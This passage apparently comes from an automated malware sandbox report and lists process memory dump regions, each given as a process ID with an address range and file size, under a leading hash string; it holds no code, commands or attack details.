                                                        e200a8abfdf470ac25f8e3fb7cb6f3def297ad0020dfe61ba5704a33eba8b7bd4cd2a55c17c14af46573be794b41dbb2e6bae0ed68d80a5e37f0183ab2a89a93

                                                      • memory/1588-27-0x0000000000FA0000-0x0000000000FB6000-memory.dmp
                                                        Filesize

                                                        88KB

                                                      • memory/1948-41-0x00007FFE83650000-0x00007FFE84111000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/1948-17-0x0000000000740000-0x0000000000758000-memory.dmp
                                                        Filesize

                                                        96KB

                                                      • memory/1948-29-0x00007FFE83650000-0x00007FFE84111000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/1948-52-0x00007FFE83650000-0x00007FFE84111000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/3356-47-0x00000000053B0000-0x00000000053BA000-memory.dmp
                                                        Filesize

                                                        40KB

                                                      • memory/3356-42-0x00000000009A0000-0x00000000009BE000-memory.dmp
                                                        Filesize

                                                        120KB

                                                      • memory/3356-43-0x0000000005150000-0x0000000005156000-memory.dmp
                                                        Filesize

                                                        24KB

                                                      • memory/3356-45-0x0000000009E50000-0x000000000A3F4000-memory.dmp
                                                        Filesize

                                                        5.6MB

                                                      • memory/3356-46-0x0000000005420000-0x00000000054B2000-memory.dmp
                                                        Filesize

                                                        584KB

                                                      • memory/3772-14-0x00007FFE83650000-0x00007FFE84111000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/3772-1-0x00007FFE83653000-0x00007FFE83655000-memory.dmp
                                                        Filesize

                                                        8KB

                                                      • memory/3772-44-0x00007FFE83650000-0x00007FFE84111000-memory.dmp
                                                        Filesize

                                                        10.8MB

                                                      • memory/3772-0-0x0000000000FD0000-0x0000000001010000-memory.dmp
                                                        Filesize

                                                        256KB

                                                      • memory/3864-128-0x000000001C120000-0x000000001C186000-memory.dmp
                                                        Filesize

                                                        408KB

                                                      • memory/3864-142-0x000000001CD40000-0x000000001CD4E000-memory.dmp
                                                        Filesize

                                                        56KB

                                                      • memory/3864-462-0x000000001C400000-0x000000001C47A000-memory.dmp
                                                        Filesize

                                                        488KB

                                                      • memory/3864-270-0x000000001D820000-0x000000001D954000-memory.dmp
                                                        Filesize

                                                        1.2MB

                                                      • memory/3864-275-0x000000001C510000-0x000000001C51A000-memory.dmp
                                                        Filesize

                                                        40KB

                                                      • memory/3864-505-0x000000001C520000-0x000000001C5A4000-memory.dmp
                                                        Filesize

                                                        528KB

                                                      • memory/3864-116-0x000000001C180000-0x000000001C1F6000-memory.dmp
                                                        Filesize

                                                        472KB

                                                      • memory/3864-117-0x000000001AEE0000-0x000000001AEEE000-memory.dmp
                                                        Filesize

                                                        56KB

                                                      • memory/3864-118-0x000000001C100000-0x000000001C11E000-memory.dmp
                                                        Filesize

                                                        120KB

                                                      • memory/3864-123-0x000000001B2A0000-0x000000001B2AA000-memory.dmp
                                                        Filesize

                                                        40KB

                                                      • memory/3864-195-0x000000001CF50000-0x000000001CF5E000-memory.dmp
                                                        Filesize

                                                        56KB

                                                      • memory/3864-139-0x000000001CB20000-0x000000001CC42000-memory.dmp
                                                        Filesize

                                                        1.1MB

                                                      • memory/4300-132-0x0000000002450000-0x0000000002484000-memory.dmp
                                                        Filesize

                                                        208KB

                                                      • memory/4300-749-0x000000001B1A0000-0x000000001B1AA000-memory.dmp
                                                        Filesize

                                                        40KB

                                                      • memory/4300-742-0x000000001C6A0000-0x000000001C828000-memory.dmp
                                                        Filesize

                                                        1.5MB

                                                      • memory/4300-621-0x000000001BFA0000-0x000000001C052000-memory.dmp
                                                        Filesize

                                                        712KB

                                                      • memory/4552-190-0x0000020FEFE80000-0x0000020FEFEA2000-memory.dmp
                                                        Filesize

                                                        136KB